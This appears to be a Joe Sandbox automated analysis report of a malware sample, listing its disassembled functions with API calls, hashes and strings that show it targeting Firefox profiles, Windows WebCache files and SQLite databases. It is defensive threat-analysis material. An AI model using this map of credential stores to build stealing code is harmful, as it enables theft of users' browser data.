                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                      Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                                                                                                      • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                      Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                                      Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 71295984-2036018995
                                                                                                                                                                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                      Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                      Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                      Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                      Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                      Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                      Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                      Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                      Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02250048), ref: 0044DF01
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02260050), ref: 0044DF11
